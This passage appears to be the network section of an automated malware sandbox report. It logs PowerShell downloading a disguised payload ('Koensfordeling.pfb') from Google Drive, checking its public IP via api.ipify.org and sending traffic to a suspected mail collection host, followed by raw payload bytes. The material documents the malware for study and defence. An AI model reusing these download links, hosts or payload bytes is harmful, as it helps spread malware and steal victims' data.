                                                      Apr 24, 2024 06:49:41.477051973 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:41.800901890 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:41.802330017 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:42.134304047 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:42.134336948 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:42.134378910 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:42.134409904 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:42.150033951 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:42.471470118 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:42.476156950 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:42.797626019 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:42.797971010 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:43.119546890 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:43.119971037 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:43.454332113 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:43.454597950 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:43.775767088 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:43.776051998 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.097059011 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.097424030 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.418631077 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.419395924 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.419395924 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.419395924 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.420124054 CEST4974126192.168.2.4114.142.162.17
                                                      Apr 24, 2024 06:49:44.740590096 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.740652084 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.740690947 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.740772963 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.746615887 CEST2649741114.142.162.17192.168.2.4
                                                      Apr 24, 2024 06:49:44.788280964 CEST4974126192.168.2.4114.142.162.17

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 24, 2024 06:48:51.899779081 CEST5089753192.168.2.41.1.1.1
                                                      Apr 24, 2024 06:48:52.053853035 CEST53508971.1.1.1192.168.2.4
                                                      Apr 24, 2024 06:48:52.872275114 CEST6286353192.168.2.41.1.1.1
                                                      Apr 24, 2024 06:48:53.026145935 CEST53628631.1.1.1192.168.2.4
                                                      Apr 24, 2024 06:49:35.153112888 CEST5456753192.168.2.41.1.1.1
                                                      Apr 24, 2024 06:49:35.321082115 CEST53545671.1.1.1192.168.2.4
                                                      Apr 24, 2024 06:49:37.827011108 CEST6081553192.168.2.41.1.1.1
                                                      Apr 24, 2024 06:49:37.982034922 CEST53608151.1.1.1192.168.2.4
                                                      Apr 24, 2024 06:49:40.209075928 CEST5784553192.168.2.41.1.1.1
                                                      Apr 24, 2024 06:49:40.498223066 CEST53578451.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 24, 2024 06:48:51.899779081 CEST192.168.2.41.1.1.10xf69fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.872275114 CEST192.168.2.41.1.1.10x38e1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:35.153112888 CEST192.168.2.41.1.1.10x6e8cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:37.827011108 CEST192.168.2.41.1.1.10xc79dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:40.209075928 CEST192.168.2.41.1.1.10xac1dStandard query (0)mail.cash4cars.nzA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.139A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.100A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.101A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.113A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.102A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:52.053853035 CEST1.1.1.1192.168.2.40xf69fNo error (0)drive.google.com142.251.2.138A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:48:53.026145935 CEST1.1.1.1192.168.2.40x38e1No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:35.321082115 CEST1.1.1.1192.168.2.40x6e8cNo error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:37.982034922 CEST1.1.1.1192.168.2.40xc79dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:37.982034922 CEST1.1.1.1192.168.2.40xc79dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:37.982034922 CEST1.1.1.1192.168.2.40xc79dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Apr 24, 2024 06:49:40.498223066 CEST1.1.1.1192.168.2.40xac1dNo error (0)mail.cash4cars.nz114.142.162.17A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com
                                                      • api.ipify.org

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730142.251.2.1394436692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 04:48:52 UTC215OUTGET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:48:52 UTC1582INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Wed, 24 Apr 2024 04:48:52 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-UfIrKKRY713Z6Iv8TOf_qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449731142.251.2.1324436692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 04:48:53 UTC233OUTGET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:48:54 UTC4750INHTTP/1.1 200 OK
                                                      X-GUploader-UploadID: ABPtcPq3pN0qa0jeIDkWh9hVtpHzEGWYNLUNw6kjmAN0TVIJvOiXSMwBqTZ_QKnVWYg2YO9ZDD8
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="Koensfordeling.pfb"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 445624
                                                      Last-Modified: Wed, 24 Apr 2024 00:15:44 GMT
                                                      Date: Wed, 24 Apr 2024 04:48:54 GMT
                                                      Expires: Wed, 24 Apr 2024 04:48:54 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=2QsOCA==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-04-24 04:48:54 UTC4750INData Raw: 63 51 47 62 63 51 47 62 75 36 70 2b 48 41 44 72 41 67 33 37 36 77 4c 75 44 77 4e 63 4a 41 54 72 41 6f 62 39 63 51 47 62 75 59 59 4d 75 69 5a 78 41 5a 76 72 41 68 63 4c 67 66 46 7a 52 61 69 47 36 77 4a 70 66 65 73 43 39 43 2b 42 36 66 56 4a 45 71 44 72 41 6b 6e 45 63 51 47 62 63 51 47 62 36 77 4b 72 6f 37 71 6a 54 48 4a 63 63 51 47 62 63 51 47 62 36 77 4a 32 64 58 45 42 6d 7a 48 4b 63 51 47 62 36 77 4b 6d 43 49 6b 55 43 33 45 42 6d 2b 73 43 4b 46 7a 52 34 6e 45 42 6d 2b 73 43 47 78 4b 44 77 51 54 72 41 6c 66 52 36 77 4b 77 49 6f 48 35 46 73 52 72 41 6e 7a 4b 63 51 47 62 36 77 4b 68 4e 34 74 45 4a 41 52 78 41 5a 76 72 41 70 38 48 69 63 50 72 41 76 49 31 36 77 4b 57 46 6f 48 44 2b 78 75 79 41 65 73 43 75 7a 39 78 41 5a 75 36 69 47 72 4e 46 6e 45 42 6d 2b 73
                                                      Data Ascii: cQGbcQGbu6p+HADrAg376wLuDwNcJATrAob9cQGbuYYMuiZxAZvrAhcLgfFzRaiG6wJpfesC9C+B6fVJEqDrAknEcQGbcQGb6wKro7qjTHJccQGbcQGb6wJ2dXEBmzHKcQGb6wKmCIkUC3EBm+sCKFzR4nEBm+sCGxKDwQTrAlfR6wKwIoH5FsRrAnzKcQGb6wKhN4tEJARxAZvrAp8HicPrAvI16wKWFoHD+xuyAesCuz9xAZu6iGrNFnEBm+s
                                                      2024-04-24 04:48:54 UTC4750INData Raw: 38 58 48 2b 6b 74 4d 4d 4c 48 65 44 4b 41 52 4a 79 32 63 78 55 74 4d 4e 47 4b 6c 42 56 54 4c 79 55 39 41 49 6b 78 57 38 4c 43 6f 4a 70 32 36 4e 6b 2b 79 6f 31 45 58 31 77 48 6a 72 7a 77 78 31 46 4a 48 78 42 47 78 70 53 69 32 42 69 68 31 67 42 70 53 4f 58 76 54 30 51 32 57 53 77 6e 53 5a 38 59 31 2b 6b 73 77 47 63 32 64 34 58 39 37 42 61 50 57 4a 49 6c 58 76 4f 6c 75 53 36 45 34 52 5a 68 77 4c 44 6f 58 76 4d 7a 38 50 33 49 4d 6b 62 68 6e 5a 49 68 69 4a 30 36 53 39 59 57 4c 69 67 4d 64 71 51 69 39 78 76 5a 79 47 34 70 79 50 4f 4e 4f 36 50 4c 6f 58 43 4d 51 6d 6f 72 49 4f 4d 6c 6e 49 6c 48 77 61 64 64 6b 7a 70 52 56 36 52 77 74 79 31 68 39 33 7a 38 6c 52 56 65 31 5a 55 4d 57 7a 4a 75 52 4d 59 56 54 6c 37 7a 52 4c 2b 6f 37 75 41 58 71 64 53 65 51 46 37 79 44
                                                      Data Ascii: 8XH+ktMMLHeDKARJy2cxUtMNGKlBVTLyU9AIkxW8LCoJp26Nk+yo1EX1wHjrzwx1FJHxBGxpSi2Bih1gBpSOXvT0Q2WSwnSZ8Y1+kswGc2d4X97BaPWJIlXvOluS6E4RZhwLDoXvMz8P3IMkbhnZIhiJ06S9YWLigMdqQi9xvZyG4pyPONO6PLoXCMQmorIOMlnIlHwaddkzpRV6Rwty1h93z8lRVe1ZUMWzJuRMYVTl7zRL+o7uAXqdSeQF7yD
                                                      2024-04-24 04:48:54 UTC447INData Raw: 34 42 66 62 38 47 71 6c 58 76 4a 45 72 42 30 55 4d 6b 64 53 5a 4b 69 77 56 6a 71 64 47 4f 62 5a 51 42 6c 2f 52 2b 79 4f 39 65 33 34 48 37 54 56 51 73 34 32 6e 47 56 6f 72 76 45 6c 53 76 78 33 4e 76 61 54 6e 4e 42 49 44 6e 33 42 6e 36 77 32 59 74 62 4d 5a 78 4e 38 68 47 6d 73 6a 46 5a 37 4d 71 6a 37 64 66 2f 77 42 34 43 33 69 44 54 32 4e 6a 46 65 4e 5a 66 4f 75 32 70 44 59 49 51 73 53 33 68 4e 6c 4c 50 74 6b 6b 4d 46 46 50 4a 42 58 4f 5a 57 6c 44 65 74 33 77 45 36 56 6f 32 4b 4a 69 6a 65 41 62 50 45 4c 6a 50 51 44 56 34 31 6c 31 52 62 72 6a 31 67 63 62 4d 51 2b 63 30 65 68 6f 49 55 72 36 36 71 75 76 6d 62 36 6c 71 37 39 7a 58 52 75 4a 68 6a 52 73 41 5a 2b 31 34 31 6c 38 4a 67 66 75 59 74 32 79 55 71 57 70 4f 45 35 42 4e 2f 30 50 6e 76 58 73 62 50 74 7a 72
                                                      Data Ascii: 4Bfb8GqlXvJErB0UMkdSZKiwVjqdGObZQBl/R+yO9e34H7TVQs42nGVorvElSvx3NvaTnNBIDn3Bn6w2YtbMZxN8hGmsjFZ7Mqj7df/wB4C3iDT2NjFeNZfOu2pDYIQsS3hNlLPtkkMFFPJBXOZWlDet3wE6Vo2KJijeAbPELjPQDV41l1Rbrj1gcbMQ+c0ehoIUr66quvmb6lq79zXRuJhjRsAZ+141l8JgfuYt2yUqWpOE5BN/0PnvXsbPtzr
                                                      2024-04-24 04:48:54 UTC1255INData Raw: 41 51 72 71 4e 66 67 34 74 4c 76 49 4e 70 72 65 41 51 67 51 44 35 2b 45 74 4c 70 67 4a 52 4f 69 49 73 6c 32 76 61 50 4e 7a 79 54 38 2b 36 79 35 4b 72 55 59 30 51 38 70 73 4c 65 35 67 32 64 62 49 36 69 56 69 46 72 47 73 33 31 59 4d 33 39 49 32 36 43 30 6f 45 41 4e 74 51 49 42 45 7a 6d 50 33 64 2f 39 44 69 46 43 74 35 4a 77 33 64 36 73 4a 2f 52 50 70 34 68 73 4e 75 75 6a 44 37 41 47 4b 56 41 4f 53 36 48 6d 5a 59 78 6b 33 53 6f 53 46 54 66 4e 67 2b 6a 66 73 5a 57 65 38 61 2b 67 42 73 36 7a 66 41 62 4f 73 33 77 47 7a 72 4e 39 79 35 52 6f 78 52 77 56 4b 55 72 45 66 69 41 4c 35 2b 43 35 79 38 71 32 37 6b 2f 66 67 68 4c 71 41 64 4a 67 45 68 34 34 74 47 4f 43 6a 7a 6a 57 41 64 45 4e 52 31 36 37 37 56 4c 79 6b 72 74 38 42 54 42 6d 66 41 4c 4f 73 4e 33 72 4a 71 4e
                                                      Data Ascii: AQrqNfg4tLvINpreAQgQD5+EtLpgJROiIsl2vaPNzyT8+6y5KrUY0Q8psLe5g2dbI6iViFrGs31YM39I26C0oEANtQIBEzmP3d/9DiFCt5Jw3d6sJ/RPp4hsNuujD7AGKVAOS6HmZYxk3SoSFTfNg+jfsZWe8a+gBs6zfAbOs3wGzrN9y5RoxRwVKUrEfiAL5+C5y8q27k/fghLqAdJgEh44tGOCjzjWAdENR1677VLykrt8BTBmfALOsN3rJqN
                                                      2024-04-24 04:48:54 UTC68INData Raw: 66 35 68 69 56 51 2b 6e 44 67 62 72 32 54 38 31 51 52 58 4d 63 78 59 77 58 79 39 7a 4c 6e 77 75 73 70 46 6c 39 2f 6b 6a 54 56 55 72 4e 56 76 37 57 6b 66 61 59 42 62 71 72 6f 2f 55 4d 31 63 64 51 6c 68 77
                                                      Data Ascii: f5hiVQ+nDgbr2T81QRXMcxYwXy9zLnwuspFl9/kjTVUrNVv7WkfaYBbqro/UM1cdQlhw
                                                      2024-04-24 04:48:54 UTC1255INData Raw: 52 30 37 39 4d 44 73 36 7a 66 7a 65 38 70 50 4e 73 6f 37 35 57 7a 78 56 36 51 47 2f 6b 42 55 48 67 62 34 44 62 6f 49 6c 56 6a 7a 51 5a 6d 37 70 48 4d 37 7a 43 36 52 79 65 53 47 65 51 54 6e 36 42 74 66 46 37 47 63 53 4e 41 33 7a 4a 44 37 62 66 4f 41 31 59 47 4f 74 7a 33 37 44 6e 50 4f 75 36 4b 63 71 4a 52 2f 68 71 73 70 52 6d 2b 6e 2f 52 4e 36 6e 39 30 6e 53 37 4e 63 70 45 68 66 55 48 53 61 45 68 55 6b 49 69 41 75 33 75 52 6a 67 56 62 52 2b 41 46 73 79 56 61 50 62 4b 73 33 34 72 2b 73 47 56 78 50 5a 39 51 36 57 75 54 32 77 46 2f 32 33 6b 54 65 6b 62 49 79 62 73 2f 63 44 2f 64 42 2b 42 67 2f 73 2b 57 78 38 45 54 56 6b 53 58 78 45 4a 4a 61 58 50 51 4d 5a 73 4c 33 77 47 7a 72 4e 38 42 73 36 7a 66 41 62 4f 73 6f 4f 31 4d 6e 53 36 78 6c 64 6c 4e 4d 4e 50 39 37
                                                      Data Ascii: R079MDs6zfze8pPNso75WzxV6QG/kBUHgb4DboIlVjzQZm7pHM7zC6RyeSGeQTn6BtfF7GcSNA3zJD7bfOA1YGOtz37DnPOu6KcqJR/hqspRm+n/RN6n90nS7NcpEhfUHSaEhUkIiAu3uRjgVbR+AFsyVaPbKs34r+sGVxPZ9Q6WuT2wF/23kTekbIybs/cD/dB+Bg/s+Wx8ETVkSXxEJJaXPQMZsL3wGzrN8Bs6zfAbOsoO1MnS6xldlNMNP97
                                                      2024-04-24 04:48:54 UTC1255INData Raw: 62 31 4d 75 50 41 7a 4c 6e 63 42 38 5a 43 41 51 58 54 72 52 34 4d 74 48 57 49 4e 62 68 51 4f 73 76 48 66 41 62 4f 73 33 77 47 7a 72 4e 38 42 73 36 7a 66 63 5a 71 51 54 55 63 4b 5a 67 54 5a 59 68 69 6a 56 4d 4b 4d 47 4f 31 6c 37 48 50 59 77 49 32 69 43 58 77 33 58 73 4f 6b 46 55 75 35 34 53 64 4b 32 62 4b 73 33 31 59 4d 36 32 75 37 75 69 30 6f 30 58 66 62 56 6f 42 45 45 31 41 4d 76 79 30 6f 57 68 6c 73 55 34 69 6b 54 54 4b 6d 33 6b 65 4c 79 64 71 63 54 73 30 2f 31 7a 4a 32 58 5a 6d 68 36 76 70 4c 71 6e 32 55 33 52 66 42 62 6e 62 68 67 39 2f 69 53 67 63 62 2f 65 48 6d 56 42 63 48 58 75 49 56 71 52 43 43 43 56 37 77 79 50 39 55 78 6a 4a 46 4b 38 5a 6c 6f 46 37 41 56 43 72 44 71 2b 45 77 56 75 4f 79 70 6b 4a 6e 69 6e 71 6d 49 59 63 61 6e 44 53 77 56 54 62 2b
                                                      Data Ascii: b1MuPAzLncB8ZCAQXTrR4MtHWINbhQOsvHfAbOs3wGzrN8Bs6zfcZqQTUcKZgTZYhijVMKMGO1l7HPYwI2iCXw3XsOkFUu54SdK2bKs31YM62u7ui0o0XfbVoBEE1AMvy0oWhlsU4ikTTKm3keLydqcTs0/1zJ2XZmh6vpLqn2U3RfBbnbhg9/iSgcb/eHmVBcHXuIVqRCCCV7wyP9UxjJFK8ZloF7AVCrDq+EwVuOypkJninqmIYcanDSwVTb+
                                                      2024-04-24 04:48:54 UTC1255INData Raw: 57 31 76 69 6b 48 70 33 47 4f 6f 57 68 5a 6c 54 4f 63 67 77 31 79 33 6e 34 61 74 58 42 55 68 6b 32 42 6e 6d 43 55 6f 49 55 46 69 62 4d 44 64 62 68 6f 42 4a 55 65 72 74 74 2f 4a 55 6a 44 65 73 33 77 48 56 6f 78 67 78 73 36 7a 66 41 62 4f 73 33 77 47 7a 72 4e 38 42 79 6a 47 68 4d 47 72 79 6a 73 53 4c 6e 69 43 74 4c 43 46 61 36 36 31 6d 5a 57 49 77 38 6d 44 79 76 47 76 74 41 62 4f 73 33 77 47 7a 72 4e 38 42 73 36 7a 66 66 63 50 6d 7a 55 4d 41 56 56 65 50 6e 4f 37 6c 78 62 34 61 31 52 36 53 77 45 75 31 2f 53 49 33 66 49 75 6f 33 38 31 6c 5a 38 4c 50 75 69 77 44 6f 33 78 70 43 58 4d 34 57 4c 74 36 4d 4a 6d 51 44 62 30 50 44 74 56 4b 54 46 63 4c 57 4c 4b 47 7a 51 31 62 59 4d 35 46 64 70 34 76 72 50 77 67 58 2b 32 62 4d 30 32 6d 32 73 52 33 2f 65 55 32 2b 37 65
                                                      Data Ascii: W1vikHp3GOoWhZlTOcgw1y3n4atXBUhk2BnmCUoIUFibMDdbhoBJUertt/JUjDes3wHVoxgxs6zfAbOs3wGzrN8ByjGhMGryjsSLniCtLCFa661mZWIw8mDyvGvtAbOs3wGzrN8Bs6zffcPmzUMAVVePnO7lxb4a1R6SwEu1/SI3fIuo381lZ8LPuiwDo3xpCXM4WLt6MJmQDb0PDtVKTFcLWLKGzQ1bYM5Fdp4vrPwgX+2bM02m2sR3/eU2+7e
                                                      2024-04-24 04:48:54 UTC1255INData Raw: 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41
                                                      Data Ascii: oAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAA
